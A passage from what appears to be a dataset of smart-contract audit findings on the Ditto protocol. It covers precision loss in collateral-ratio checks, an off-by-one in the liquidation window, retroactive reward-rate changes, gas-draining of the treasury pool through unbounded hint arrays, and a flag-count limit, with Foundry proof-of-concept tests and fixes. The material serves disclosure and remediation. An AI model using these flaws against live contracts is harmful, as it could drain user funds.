uint256(price).div(uint256(basePrice));\\n 57 oracleCircuitBreaker(\\n 58 roundID, baseRoundID, price, basePrice, timeStamp, baseTimeStamp\\n 59 );\\n 60 return priceInEth;\\n 61 }\\n 62 }\\n```\\n\\nBased on whether the `oracle` is `baseOracle` or not, the function returns either `basePriceEth` or `priceInEth`.\\n`basePriceEth` can be `uint256(basePrice * Constants.BASE_ORACLE_DECIMALS).inv()` which is basically `1e36 / (basePrice * Constants.BASE_ORACLE_DECIMALS)` or simply written, of the form `oracleN / oracleD` where `oracleN` is the numerator with value 1e36 (as defined here) and `oracleD` is the denominator.\\n`priceInEth` is given as uint256 `priceInEth` = uint256(price).div(uint256(basePrice)) which again is of the form `oracleN / oracleD`.\\n\\nPART 2:\\ngetSavedOrSpotOraclePrice() too internally calls the above `getOraclePrice()` function, if it has been equal to or more than 15 minutes since the last time `LibOrders.getOffsetTime()` was set:\\n```\\n File: contracts/libraries/LibOracle.sol\\n\\n 153 function getSavedOrSpotOraclePrice(address asset) internal view returns (uint256) {\\n 154 if (LibOrders.getOffsetTime() - getTime(asset) < 15 minutes) {\\n 155 return getPrice(asset);\\n 156 } else {\\n 157 return getOraclePrice(asset);\\n 158 }\\n 159 }\\n```\\n\\n\\nPART 3:\\ngetCollateralRatioSpotPrice() calculates `cRatio` as:\\n```\\n File: contracts/libraries/LibShortRecord.sol\\n\\n 30 function getCollateralRatioSpotPrice(\\n 31 STypes.ShortRecord memory short,\\n 32 uint256 oraclePrice\\n 33 ) internal pure returns (uint256 cRatio) {\\n 34 return short.collateral.div(short.ercDebt.mul(oraclePrice));\\n 35 }\\n```\\n\\n\\nPART 4 (FINAL PART):\\nThere are multiple places in the code (mentioned below under Impacts section) which compare the user's `cRatio` to `initialCR` or `LibAsset.primaryLiquidationCR(_asset)` in the following manner:\\n```\\nif (short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset)) < LibAsset.primaryLiquidationCR(asset))\\n```\\n\\n\\nCalling `short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset))` means the value returned from it would be:\\n```\\n // @audit-issue : Potential precision loss. Division before multiplication should not be done.\\n shortCollateral / (shortErcDebt * (oracleN / oracleD)) // return short.collateral.div(short.ercDebt.mul(oraclePrice));\\n```\\n\\nwhich has the potential for precision loss (rounding-up) due to division before multiplication. The correct style ought to be:\\n```\\n// Add the line below\\n (shortCollateral * oracleD) / (shortErcDebt * oracleN)\\n```\\n\\n\\nHave attempted to keep all values in close proximity to the ones present in forked mainnet tests.\\nLet's assume some values for numerator & denominator and other variables:\\n```\\n uint256 private short_collateral = 100361729669569000000; // ~ 100 ether\\n uint256 private short_ercDebt = 100000000000000000000000; // 100_000 ether\\n uint256 private price = 99995505; // oracleN\\n uint256 private basePrice = 199270190598; // oracleD\\n uint256 private primaryLiquidationCR = 2000000000000000000; // 2 ether (as on forked mainnet)\\n\\n// For this example, we assume that oracle != baseOracle, so that the below calculation would be done by the protocol\\nSo calculated priceInEth = price.div(basePrice) = 501808648347845 // ~ 0.0005 ether\\n```\\n\\n\\nLet's calculate for the scenario of `flagShort()` where the code logic says:\\n```\\n 53 if (\\n 54 short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset))\\n 55 >= LibAsset.primaryLiquidationCR(asset) // @audit-issue : this will evaluate to `true`, then revert, due to rounding-up and the short will incorrectly escape flagging\\n 56 ) {\\n 57 revert Errors.SufficientCollateral();\\n 58 }\\n```\\n\\n\\nCreate a file named `test/IncorrectCRatioCheck.t.sol` and paste the following code in it. Some mock functions are included here which mirror protocol's calculation style:\\n```\\n// SPDX-License-Identifier: GPL-3.0-only\\npragma solidity 0.8.21;\\n\\nimport {U256} from ""contracts/libraries/PRBMathHelper.sol"";\\nimport {OBFixture} from ""test/utils/OBFixture.sol"";\\nimport {console} from ""contracts/libraries/console.sol"";\\n\\ncontract IncorrectCRatioCheck is OBFixture {\\n using U256 for uint256;\\n\\n uint256 private short_collateral = 85307470219133700000; // ~ 85.3 ether\\n uint256 private short_ercDebt = 100000000000000000000000; // 100_000 ether\\n uint256 private price = 99995505; // oracleN\\n uint256 private basePrice = 199270190598; // (as on forked mainnet) // oracleD\\n uint256 private primaryLiquidationCR = 1700000000000000000; // 1.7 ether (as on forked mainnet)\\n\\n function _getSavedOrSpotOraclePrice() internal view returns (uint256) {\\n uint256 priceInEth = price.div(basePrice);\\n return priceInEth; // will return 501808648347845 =~ 0.0005 ether // (as on forked mainnet)\\n }\\n\\n function getCollateralRatioSpotPrice_IncorrectStyle_As_In_Existing_DittoProtocol(\\n uint256 oraclePrice\\n ) internal view returns (uint256) {\\n return short_collateral.div(short_ercDebt.mul(oraclePrice));\\n }\\n\\n function getCollateralRatioSpotPrice_CorrectStyle(uint256 oracleN, uint256 oracleD)\\n internal\\n view\\n returns (uint256)\\n {\\n return (short_collateral.mul(oracleD)).div(short_ercDebt.mul(oracleN));\\n }\\n\\n /* solhint-disable no-console */\\n function test_GetCollateralRatioSpotPrice_IncorrectStyle_As_In_Existing_DittoProtocol(\\n ) public view {\\n uint256 cRatio =\\n getCollateralRatioSpotPrice_IncorrectStyle_As_In_Existing_DittoProtocol(\\n _getSavedOrSpotOraclePrice()\\n );\\n console.log(""cRatio calculated (existing style) ="", cRatio);\\n if (cRatio >= primaryLiquidationCR) {\\n console.log(""Errors.SufficientCollateral; can not be flagged"");\\n } else {\\n console.log(""InsufficientCollateral; can be flagged"");\\n }\\n }\\n\\n /* solhint-disable no-console */\\n function test_GetCollateralRatioSpotPrice_CorrectStyle() public view {\\n uint256 cRatio = getCollateralRatioSpotPrice_CorrectStyle(price, basePrice);\\n console.log(""cRatio calculated (correct style) ="", cRatio);\\n if (cRatio >= primaryLiquidationCR) {\\n console.log(""Errors.SufficientCollateral; can not be flagged"");\\n } else {\\n console.log(""InsufficientCollateral; can be flagged"");\\n }\\n }\\n}\\n```\\n\\n\\nFirst, let's see the output as per protocol's calculation. Run forge test --mt test_GetCollateralRatioSpotPrice_IncorrectStyle_As_In_Existing_DittoProtocol -vv:\\n```\\nLogs:\\n cRatio calculated (existing style) = 1700000000000000996\\n Errors.SufficientCollateral; can not be flagged\\n```\\n\\nSo the short can not be flagged as `cRatio > primaryLiquidationCR` of 1700000000000000000.\\nNow, let's see the output as per the correct calculation. Run forge test --mt test_GetCollateralRatioSpotPrice_CorrectStyle -vv:\\n```\\nLogs:\\n cRatio calculated (correct style) = 1699999999999899995\\n InsufficientCollateral; can be flagged\\n```\\n\\nShort's cRatio is actually below primaryLiquidationCR. Should have been flagged ideally.\\n","These steps need to be taken to fix the issue. Developer may have to make some additional changes since `.mul`, `.div`, etc are being used from the `PRBMathHelper.sol` library. Following is the general workflow required:\\nCreate additional functions to fetch oracle parameters instead of price: Create copies of `getOraclePrice()` and `getSavedOrSpotOraclePrice()`, but these ones return `oracleN` & `oracleD` instead of the calculated price. Let's assume the new names to be `getOraclePriceParams()` and `getSavedOrSpotOraclePriceParams()`.\\nCreate a new function to calculate cRatio which will be used in place of the above occurences of getCollateralRatioSpotPrice():\\n```\\n function getCollateralRatioSpotPriceFromOracleParams(\\n STypes.ShortRecord memory short,\\n uint256 oracleN,\\n uint256 oracleD\\n ) internal pure returns (uint256 cRatio) {\\n return (short.collateral.mul(oracleD)).div(short.ercDebt.mul(oracleN));\\n }\\n```\\n\\n\\nFor fixing the last issue of `oraclePrice.mul(1.01 ether)` on L847, first call `getOraclePriceParams()` to get `oracleN` & `oracleD` and then:\\n```\\n 845 //@dev: force hint to be within 1% of oracleprice\\n 846 bool startingShortWithinOracleRange = shortPrice\\n// Remove the line below\\n 847 <= oraclePrice.mul(1.01 ether)\\n// Add the line below\\n 847 <= (oracleN.mul(1.01 ether)).div(oracleD)\\n 848 && s.shorts[asset][prevId].price >= oraclePrice;\\n```\\n","```\\n File: contracts/facets/YieldFacet.sol\\n\\n 76 function _distributeYield(address asset)\\n 77 private\\n 78 onlyValidAsset(asset)\\n 79 returns (uint88 yield, uint256 dittoYieldShares)\\n 80 {\\n 81 uint256 vault = s.asset[asset].vault;\\n 82 // Last updated zethYieldRate for this vault\\n 83 uint80 zethYieldRate = s.vault[vault].zethYieldRate;\\n 84 // Protocol time\\n 85 uint256 timestamp = LibOrders.getOffsetTimeHours();\\n 86 // Last saved oracle price\\n 87 uint256 oraclePrice = LibOracle.getPrice(asset);\\n 88 // CR of shortRecord collateralized at initialMargin for this asset\\n 89 uint256 initialCR = LibAsset.initialMargin(asset) + 1 ether;\\n 90 // Retrieve first non-HEAD short\\n 91 uint8 id = s.shortRecords[asset][msg.sender][Constants.HEAD].nextId;\\n 92 // Loop through all shorter's shorts of this asset\\n 93 while (true) {\\n 94 // One short of one shorter in this market\\n 95 STypes.ShortRecord storage short = s.shortRecords[asset][msg.sender][id];\\n 96 // To prevent flash loans or loans where they want to deposit to claim yield immediately\\n 97 bool isNotRecentlyModified =\\n 98 timestamp - short.updatedAt > Constants.YIELD_DELAY_HOURS;\\n 99 // Check for cancelled short\\n 100 if (short.status != SR.Cancelled && isNotRecentlyModified) {\\n 101 uint88 shortYield =\\n 102 short.collateral.mulU88(zethYieldRate - short.zethYieldRate);\\n 103 // Yield earned by this short\\n 104 yield += shortYield;\\n 105 // Update zethYieldRate for this short\\n 106 short.zethYieldRate = zethYieldRate;\\n 107 // Calculate CR to modify ditto rewards\\n 108 uint256 cRatio = short.getCollateralRatioSpotPrice(oraclePrice);\\n 109 if (cRatio <= initialCR) {\\n 110 dittoYieldShares += shortYield;\\n 111 } else {\\n 112 // Reduce amount of yield credited for ditto rewards proportional to CR\\n 113 dittoYieldShares += shortYield.mul(initialCR).div(cRatio);\\n 114 }\\n 115 }\\n 116 // Move to next short unless this is the last one\\n 117 if (short.nextId > Constants.HEAD) {\\n 118 id = short.nextId;\\n 119 } else {\\n 120 break;\\n 121 }\\n 122 }\\n 123 }\\n```\\n\\nThis rounding-up can lead to user's `cRatio` to be considered as `>initialCR` even when it's slightly lower. This results in greater `dittoYieldShares` being calculated.\\n```\\n File: contracts/facets/MarginCallPrimaryFacet.sol\\n\\n 43 function flagShort(address asset, address shorter, uint8 id, uint16 flaggerHint)\\n 44 external\\n 45 isNotFrozen(asset)\\n 46 nonReentrant\\n 47 onlyValidShortRecord(asset, shorter, id)\\n 48 {\\n 49 if (msg.sender == shorter) revert Errors.CannotFlagSelf();\\n 50 STypes.ShortRecord storage short = s.shortRecords[asset][shorter][id];\\n 51 short.updateErcDebt(asset);\\n 52\\n 53 if (\\n 54 short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset))\\n 55 >= LibAsset.primaryLiquidationCR(asset) // @audit-issue : this will evaluate to `true` due to rounding-up and the short will not be eligible for flagging\\n 56 ) {\\n 57 revert Errors.SufficientCollateral();\\n 58 }\\n 59\\n 60 uint256 adjustedTimestamp = LibOrders.getOffsetTimeHours();\\n 61\\n 62 // check if already flagged\\n 63 if (short.flaggerId != 0) {\\n 64 uint256 timeDiff = adjustedTimestamp - short.updatedAt;\\n 65 uint256 resetLiquidationTime = LibAsset.resetLiquidationTime(asset);\\n 66\\n 67 if (timeDiff <= resetLiquidationTime) {\\n 68 revert Errors.MarginCallAlreadyFlagged();\\n 69 }\\n 70 }\\n 71\\n 72 short.setFlagger(cusd, flaggerHint);\\n 73 emit Events.FlagShort(asset, shorter, id, msg.sender, adjustedTimestamp);\\n 74 }\\n```\\n\\n\\n```\\n File: contracts/facets/MarginCallSecondaryFacet.sol\\n\\n 38 function liquidateSecondary(\\n 39 address asset,\\n 40 MTypes.BatchMC[] memory batches,\\n 41 uint88 liquidateAmount,\\n 42 bool isWallet\\n 43 ) external onlyValidAsset(asset) isNotFrozen(asset) nonReentrant {\\n 44 STypes.AssetUser storage AssetUser = s.assetUser[asset][msg.sender];\\n 45 MTypes.MarginCallSecondary memory m;\\n 46 uint256 minimumCR = LibAsset.minimumCR(asset);\\n 47 uint256 oraclePrice = LibOracle.getSavedOrSpotOraclePrice(asset);\\n 48 uint256 secondaryLiquidationCR = LibAsset.secondaryLiquidationCR(asset);\\n 49\\n 50 uint88 liquidatorCollateral;\\n 51 uint88 liquidateAmountLeft = liquidateAmount;\\n 52 for (uint256 i; i < batches.length;) {\\n 53 m = _setMarginCallStruct(\\n 54 asset, batches[i].shorter, batches[i].shortId, minimumCR, oraclePrice\\n 55 );\\n 56\\n\\n // rest of code// rest of code\\n // rest of code// rest of code\\n // rest of code// rest of code\\n\\n\\n 129 function _setMarginCallStruct(\\n 130 address asset,\\n 131 address shorter,\\n 132 uint8 id,\\n 133 uint256 minimumCR,\\n 134 uint256 oraclePrice\\n 135 ) private returns (MTypes.MarginCallSecondary memory) {\\n 136 LibShortRecord.updateErcDebt(asset, shorter, id);\\n 137\\n 138 MTypes.MarginCallSecondary memory m;\\n 139 m.asset = asset;\\n 140 m.short = s.shortRecords[asset][shorter][id];\\n 141 m.vault = s.asset[asset].vault;\\n 142 m.shorter = shorter;\\n 143 m.minimumCR = minimumCR;\\n 144 m.cRatio = m.short.getCollateralRatioSpotPrice(oraclePrice);\\n 145 return m;\\n 146 }\\n```\\n\\n\\n```\\n File: contracts/facets/ShortRecordFacet.sol\\n\\n 117 function combineShorts(address asset, uint8[] memory ids)\\n 118 external\\n 119 isNotFrozen(asset)\\n 120 nonReentrant\\n 121 onlyValidShortRecord(asset, msg.sender, ids[0])\\n 122 {\\n 123 if (ids.length < 2) revert Errors.InsufficientNumberOfShorts();\\n 124 // First short in the array\\n 125 STypes.ShortRecord storage firstShort = s.shortRecords[asset][msg.sender][ids[0]];\\n \\n // rest of code// rest of code\\n // rest of code// rest of code\\n // rest of code// rest of code\\n\\n 174\\n 175 // Merge all short records into the short at position id[0]\\n 176 firstShort.merge(ercDebt, ercDebtSocialized, collateral, yield, c.shortUpdatedAt);\\n 177\\n 178 // If at least one short was flagged, ensure resulting c-ratio > primaryLiquidationCR\\n 179 if (c.shortFlagExists) {\\n 180 if (\\n 181 firstShort.getCollateralRatioSpotPrice(\\n 182 LibOracle.getSavedOrSpotOraclePrice(_asset)\\n 183 ) < LibAsset.primaryLiquidationCR(_asset)\\n 184 ) revert Errors.InsufficientCollateral();\\n 185 // Resulting combined short has sufficient c-ratio to remove flag\\n 186 firstShort.resetFlag();\\n 187 }\\n 188 emit Events.CombineShorts(asset, msg.sender, ids);\\n 189 }\\n```\\n\\n\\nNOTE:\\nWhile the operation done in this piece of code is a bit different from the above analysis, I am clubbing it with this bug report as the underlying issue is the same (and the resolution would be similar): Multiplication and division operations should not be done directly on top of fetched oracle price, without paying attention to new order of evaluation:\\n```\\n File: contracts/libraries/LibOrders.sol\\n\\n 812 function _updateOracleAndStartingShort(address asset, uint16[] memory shortHintArray)\\n 813 private\\n 814 {\\n 815 AppStorage storage s = appStorage();\\n 815 uint256 oraclePrice = LibOracle.getOraclePrice(asset);\\n \\n // rest of code// rest of code\\n // rest of code// rest of code\\n // rest of code// rest of code\\n\\n 845 //@dev: force hint to be within 1% of oracleprice\\n 846 bool startingShortWithinOracleRange = shortPrice\\n 847 <= oraclePrice.mul(1.01 ether) // @audit-issue : division before multiplication\\n 848 && s.shorts[asset][prevId].price >= oraclePrice;\\n \\n // rest of code// rest of code\\n // rest of code// rest of code\\n // rest of code// rest of code\\n\\n 866 }\\n```\\n\\n\\nThe effective calculation being done above is:\\n```\\n (oracleN / oracleD) * (1.01 ether) // division before multiplication\\n```\\n\\n\\nWhich should have been:\\n```\\n (oracleN * 1.01 ether) / oracle\\n```\\n\\n\\nSimilar multiplication or division operations have been done on `price` at various places throughout the code, which can be clubbed under this root cause itself.",```\\nuint256 cRatio = short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset));\\n```\\n +Primary short liquidation can not be completed in the last hour of the liquidation timeline,medium,"Shorts flagged for liquidation can not be liquidated in the last and final hour of the liquidation timeline, resulting in the liquidation flag being reset and requiring the short to be flagged again.\\nIf a short's collateral ratio is below the primary liquidation threshold (determined by the `LibAsset.primaryLiquidationCR` function, by default set to 400%), anyone can flag the position for liquidation by calling the `MarginCallPrimaryFacet.flagShort` function.\\nSubsequently, the short position owner has a certain amount of time, specifically, `10 hours` (configured and determined by the `LibAsset.firstLiquidationTime` function), to repay the loan and bring the collateral ratio back above the primary liquidation threshold. If the short position owner fails to do so, the short position can be liquidated by calling the `MarginCallPrimaryFacet.liquidate` function.\\nThe specific criteria for the liquidation eligibility are defined and determined in the `MarginCallPrimaryFacet._canLiquidate` function.\\ncontracts/facets/MarginCallPrimaryFacet.sol#L387\\n```\\nfunction _canLiquidate(MTypes.MarginCallPrimary memory m)\\n private\\n view\\n returns (bool)\\n{\\n// rest of code // [// rest of code]\\n uint256 timeDiff = LibOrders.getOffsetTimeHours() - m.short.updatedAt;\\n uint256 resetLiquidationTime = LibAsset.resetLiquidationTime(m.asset);\\n❌ if (timeDiff >= resetLiquidationTime) {\\n return false;\\n } else {\\n uint256 secondLiquidationTime = LibAsset.secondLiquidationTime(m.asset);\\n bool isBetweenFirstAndSecondLiquidationTime = timeDiff\\n > LibAsset.firstLiquidationTime(m.asset) && timeDiff <= secondLiquidationTime\\n && s.flagMapping[m.short.flaggerId] == msg.sender;\\n bool isBetweenSecondAndResetLiquidationTime =\\n timeDiff > secondLiquidationTime && timeDiff <= resetLiquidationTime;\\n if (\\n !(\\n (isBetweenFirstAndSecondLiquidationTime)\\n || (isBetweenSecondAndResetLiquidationTime)\\n )\\n ) {\\n revert Errors.MarginCallIneligibleWindow();\\n }\\n return true;\\n }\\n}\\n```\\n\\nThis function checks in lines 387-389 if the elapsed time (timeDiff) since the short was updated is equal or greater than the reset liquidation time (resetLiquidationTime), which is by default set to `16 hours`. In this case, the short position has not been liquidated in time and has to be flagged again.\\nHowever, this condition conflicts with the `isBetweenSecondAndResetLiquidationTime` criteria in lines 394-395, specifically, the `timeDiff` <= `resetLiquidationTime` check. If the `timeDiff` value is equal to `resetLiquidationTime`, both conditions, in line 387 as well as the check in line 395, are `true`. Due to line 387 taking precedence, the liquidation is considered outdated and the short position has to be flagged again.\\nBased on the check in lines 67-69 of the `flagShort` function, it is evident that a short position flagged for liquidation requires re-flagging only if the `timeDiff` value is greater (>) than the reset liquidation time (resetLiquidationTime):\\ncontracts/facets/MarginCallPrimaryFacet.sol#L67-L69\\n```\\nif (timeDiff <= resetLiquidationTime) {\\n revert Errors.MarginCallAlreadyFlagged();\\n}\\n```\\n\\nThus, the check in line 387 is incorrect, leading to prematurely resetting the short's liquidation flagging status.\\nAs the timestamps are in `hours`, and the liquidation timeline is relatively short, having an off-by-one error in the liquidation timeline can lead to a significant impact on the liquidations. Concretely, attempting to liquidate a short position in the last hour of the timeline, i.e., `timeDiff = 16`, is not possible.",Consider using `>` instead of `>=` in line 387 to prevent the liquidation timeline from overlapping with the bounds check in line 395.,,```\\nfunction _canLiquidate(MTypes.MarginCallPrimary memory m)\\n private\\n view\\n returns (bool)\\n{\\n// rest of code // [// rest of code]\\n uint256 timeDiff = LibOrders.getOffsetTimeHours() - m.short.updatedAt;\\n uint256 resetLiquidationTime = LibAsset.resetLiquidationTime(m.asset);\\n❌ if (timeDiff >= resetLiquidationTime) {\\n return false;\\n } else {\\n uint256 secondLiquidationTime = LibAsset.secondLiquidationTime(m.asset);\\n bool isBetweenFirstAndSecondLiquidationTime = timeDiff\\n > LibAsset.firstLiquidationTime(m.asset) && timeDiff <= secondLiquidationTime\\n && s.flagMapping[m.short.flaggerId] == msg.sender;\\n bool isBetweenSecondAndResetLiquidationTime =\\n timeDiff > secondLiquidationTime && timeDiff <= resetLiquidationTime;\\n if (\\n !(\\n (isBetweenFirstAndSecondLiquidationTime)\\n || (isBetweenSecondAndResetLiquidationTime)\\n )\\n ) {\\n revert Errors.MarginCallIneligibleWindow();\\n }\\n return true;\\n }\\n}\\n```\\n +Changes in `dittoShorterRate` affect retroactively to accrued Ditto yield shares,low,"The calculation of the Ditto rewards earned by shorters does not take into account that the changes in the Ditto shorter rate will impact retroactively, inflating or deflating the new Ditto rewards of the users.\\n`YieldFacet.sol:distributeYield()` calculates and credits ZETH and Ditto rewards earned from short records by `msg.sender`. The distribution of the rewards is performed in the `_claimYield()` function:\\n```\\n125 // Credit ZETH and Ditto rewards earned from shortRecords from all markets\\n126 function _claimYield(uint256 vault, uint88 yield, uint256 dittoYieldShares) private {\\n127 STypes.Vault storage Vault = s.vault[vault];\\n128 STypes.VaultUser storage VaultUser = s.vaultUser[vault][msg.sender];\\n129 // Implicitly checks for a valid vault\\n130 if (yield <= 1) revert Errors.NoYield();\\n131 // Credit yield to ethEscrowed\\n132 VaultUser.ethEscrowed += yield;\\n133 // Ditto rewards earned for all shorters since inception\\n134 uint256 protocolTime = LibOrders.getOffsetTime();\\n135 uint256 dittoRewardShortersTotal = Vault.dittoShorterRate * protocolTime;\\n136 // Ditto reward proportion from this yield distribution\\n137 uint256 dittoYieldSharesTotal = Vault.zethCollateralReward;\\n138 uint256 dittoReward =\\n139 dittoYieldShares.mul(dittoRewardShortersTotal).div(dittoYieldSharesTotal);\\n140 // Credit ditto reward to user\\n141 if (dittoReward > type(uint80).max) revert Errors.InvalidAmount();\\n142 VaultUser.dittoReward += uint80(dittoReward);\\n143 }\\n```\\n\\nFocusing on the Ditto rewards, we can see that the function receives the number of yield shares earned by the user (dittoYieldShares) and in line 138 calculates the Ditto reward by multiplying this amount by the total amount of rewards of the protocol (dittoRewardShortersTotal) and dividing it by the total amount of yield shares of the protocol (dittoYieldSharesTotal).\\nIf we take a look in line 135 at how the `dittoRewardShortersTotal` is calculated, we can see that it is the product of the Ditto shorter rate and total time elapsed since the protocol deployment.\\nThis last calculation is wrong, as it is assumed that the Ditto shorter rate is constant, but this parameter can be changed by the admin or the DAO. This means that the changes in the Ditto shorter rate will impact retroactively, inflating or deflating the new Ditto rewards of the users. Also, users that have yielded the same number of shares during the same period, will receive different rewards depending on whether they claim their rewards before or after the Ditto shorter rate change.\\nAdd the following code snippet into `test/Yield.t.sol` and run `forge test --mt testYieldRateChange`.\\n```\\n function testYieldRateChange() public {\\n address alice = makeAddr(""alice"");\\n address bob = makeAddr(""bob"");\\n address[] memory assets = new address[](1);\\n assets[0] = asset;\\n\\n fundLimitBid(DEFAULT_PRICE, 320000 ether, receiver);\\n fundLimitShort(DEFAULT_PRICE, 80000 ether, alice);\\n fundLimitShort(DEFAULT_PRICE, 80000 ether, bob);\\n generateYield();\\n skip(yieldEligibleTime);\\n\\n // Alice and Bob have the same number of Ditto yield shares\\n assertEq(diamond.getDittoMatchedReward(vault, alice), diamond.getDittoMatchedReward(vault, alice));\\n\\n // Alice's yield is distributed\\n vm.prank(alice);\\n diamond.distributeYield(assets);\\n\\n // Ditto shorter rate is updated\\n vm.prank(owner);\\n diamond.setDittoShorterRate(vault, 2);\\n\\n // Bob's yield is distributed\\n vm.prank(bob);\\n diamond.distributeYield(assets);\\n\\n uint256 aliceDittoRewards = diamond.getDittoReward(vault, alice);\\n uint256 bobDittoRewards = diamond.getDittoReward(vault, bob);\\n\\n // Bob receives more Ditto rewards than Alice, even both were entitled to the same amount\\n assertApproxEqAbs(aliceDittoRewards * 2, bobDittoRewards, 2);\\n }\\n```\\n",Create two new state variables that keep track of the timestamp of the last Ditto shorter rate update and the total Ditto rewards accrued at that time. Then the calculation of `dittoRewardShortersTotal` would be:\\n```\\n uint256 dittoRewardShortersTotal = lastSnapshotRewards + Vault.dittoShorterRate * (protocolTime - lastSnapshotTimestamp);\\n```\\n,"Changes in the Ditto shorter rate will impact retroactively, inflating or deflating the new Ditto rewards of the users. Users might not be incentivized to claim their rewards, as they might receive more rewards if they wait for the Ditto shorter rate to change.","```\\n125 // Credit ZETH and Ditto rewards earned from shortRecords from all markets\\n126 function _claimYield(uint256 vault, uint88 yield, uint256 dittoYieldShares) private {\\n127 STypes.Vault storage Vault = s.vault[vault];\\n128 STypes.VaultUser storage VaultUser = s.vaultUser[vault][msg.sender];\\n129 // Implicitly checks for a valid vault\\n130 if (yield <= 1) revert Errors.NoYield();\\n131 // Credit yield to ethEscrowed\\n132 VaultUser.ethEscrowed += yield;\\n133 // Ditto rewards earned for all shorters since inception\\n134 uint256 protocolTime = LibOrders.getOffsetTime();\\n135 uint256 dittoRewardShortersTotal = Vault.dittoShorterRate * protocolTime;\\n136 // Ditto reward proportion from this yield distribution\\n137 uint256 dittoYieldSharesTotal = Vault.zethCollateralReward;\\n138 uint256 dittoReward =\\n139 dittoYieldShares.mul(dittoRewardShortersTotal).div(dittoYieldSharesTotal);\\n140 // Credit ditto reward to user\\n141 if (dittoReward > type(uint80).max) revert Errors.InvalidAmount();\\n142 VaultUser.dittoReward += uint80(dittoReward);\\n143 }\\n```\\n" +Margin callers can drain the TAPP during liquidation by willingly increase gas costs with the shortHintArray,high,"During primary liquidation the TAPP (Treasury Asset Protection Pool) pays the gas costs of force bids, so that margin callers are even motivated to liquidate shorters, if gas costs are high. To liquidate a shortRecord margin, callers must provide a parameter called shortHintArray to the function call. The purpose of this array is to save gas, it should contain id hints where the protocol should look for shorts in the order book which are currently above the oracle price, since users can't match against shorts under the oracle price. As the protocol loops through this shortHintArray, an array with wrong hints could increase gas and as the length of the array is never checked, it could even increase the gas costs to an amount that would fully drain the TAPP. As the TAPP is an important security mechanism of the protocol, draining the funds of it could lead to a shutdown of the market and therefore to a big loss of user funds.\\nThe liquidate function takes the shortHintArray as parameter:\\n```\\nfunction liquidate(\\n address asset,\\n address shorter,\\n uint8 id,\\n uint16[] memory shortHintArray\\n)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, shorter, id)\\n returns (uint88, uint88)\\n{\\n// rest of code\\n}\\n```\\n\\nThis array is then used to create a forceBid:\\n```\\n(m.ethFilled, ercAmountLeft) = IDiamond(payable(address(this))).createForcedBid(\\n address(this), m.asset, _bidPrice, m.short.ercDebt, shortHintArray\\n);\\n```\\n\\nAnd during these process, the protocol loops over this array:\\n```\\nfunction _updateOracleAndStartingShort(address asset, uint16[] memory shortHintArray)\\n private\\n{\\n // rest of code\\n uint16 shortHintId;\\n for (uint256 i = 0; i < shortHintArray.length;) {\\n shortHintId = shortHintArray[i];\\n unchecked {\\n ++i;\\n }\\n\\n {\\n O shortOrderType = s.shorts[asset][shortHintId].orderType;\\n if (\\n shortOrderType == O.Cancelled || shortOrderType == O.Matched\\n || shortOrderType == O.Uninitialized\\n ) {\\n continue;\\n }\\n }\\n // rest of code\\n}\\n```\\n\\nIn the end, the TAPP pays for the gas costs in the _marginFeeHandler function:\\n```\\nfunction _marginFeeHandler(MTypes.MarginCallPrimary memory m) private {\\n STypes.VaultUser storage VaultUser = s.vaultUser[m.vault][msg.sender];\\n STypes.VaultUser storage TAPP = s.vaultUser[m.vault][address(this)];\\n // distribute fees to TAPP and caller\\n uint88 tappFee = m.ethFilled.mulU88(m.tappFeePct);\\n uint88 callerFee = m.ethFilled.mulU88(m.callerFeePct) + m.gasFee;\\n\\n m.totalFee += tappFee + callerFee;\\n //@dev TAPP already received the gasFee for being the forcedBid caller. tappFee nets out.\\n if (TAPP.ethEscrowed >= callerFee) {\\n TAPP.ethEscrowed -= callerFee;\\n VaultUser.ethEscrowed += callerFee;\\n } else {\\n // Give caller (portion of?) tappFee instead of gasFee\\n VaultUser.ethEscrowed += callerFee - m.gasFee + tappFee;\\n m.totalFee -= m.gasFee;\\n TAPP.ethEscrowed -= m.totalFee;\\n }\\n}\\n```\\n\\nTherefore, if the user provides a big shortHintArray with wrong hints the gas costs will drastically increase to a point which drains the funds of the TAPP.",Check the length of the shortHintArray.,"As the TAPP does no longer has enough funds to pay for liquidation, if shortRecords are under collateralized. A lot of problems like the increment of the ercDebtRate and the shutdown of the market can occur. This leads to a big loss of user funds.","```\\nfunction liquidate(\\n address asset,\\n address shorter,\\n uint8 id,\\n uint16[] memory shortHintArray\\n)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, shorter, id)\\n returns (uint88, uint88)\\n{\\n// rest of code\\n}\\n```\\n" +The protocol allows less flags to be generated than possible which could lead to a DoS of the primary liquidation process,low,"The maximum flags (for liquidation) that can exist at the same time should be limited by the maximum number, of flaggerIdCounter which is a uint24, but it is limited by the maximum number of a uint16 instead. Therefore, a maximum of 65535 shortRecords can be flagged for liquidation at the same time. This is way too less if the protocol is used a lot and a market goes up in price, and would therefore lead to a DoS of the liquidation process.\\nThe maximum of the flaggerIdCounter and therefore the maximum of flags that can exist at the same time is limited by the maximum number of a uint24:\\n```\\nuint24 flaggerIdCounter;\\n```\\n\\nIf there are no flags left to override the system tries to generate a new flagId, but it does not use the maximum number of uint24, it uses the maximum number of uint16 instead, which is 65535:\\n```\\n} else if (s.flaggerIdCounter < type(uint16).max) {\\n //@dev generate brand new flaggerId\\n short.flaggerId = flagStorage.g_flaggerId = s.flaggerIdCounter;\\n s.flaggerIdCounter++;\\n} else {\\n revert Errors.InvalidFlaggerHint();\\n}\\n```\\n\\nThis could be way to less if the protocol is used a lot and the price of a market goes up. Therefore it would prevent creating new flaggerIds and shortRecords with unhealthy CR can not be liquidated.",Set the check to type(uint24).max.,"DoS of the liquidation process, which could potentially lead to a lot of shortRecords with unhealthy CR, which could in the worst case lead to the situation that assets are no longer backed enough, and the market needs to be shut down. This would result in a big loss of user funds.",```\\nuint24 flaggerIdCounter;\\n```\\n +Infinite loop breaks protocol functionality.,low,"Protocol documentation says that DAO is able to cancel up to 1,000 orders when order count is above 65,000. However, because of the faulty `for loop` it is impossible to cancel more than 255 orders.\\nVulnerability details\\n`orderId` is implemented in protocol to index orders in orderbook. In the protocol documentation it is written that it can handle above 65,000 orders because of 